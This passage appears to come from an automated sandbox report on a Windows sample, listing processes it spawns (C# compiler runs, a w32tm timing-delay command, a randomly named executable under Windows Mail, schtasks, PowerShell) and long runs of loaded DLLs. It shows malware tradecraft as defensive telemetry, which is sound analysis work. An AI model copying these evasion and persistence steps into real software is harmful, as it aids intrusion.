                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\9XHFe6y4Dj.exe "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
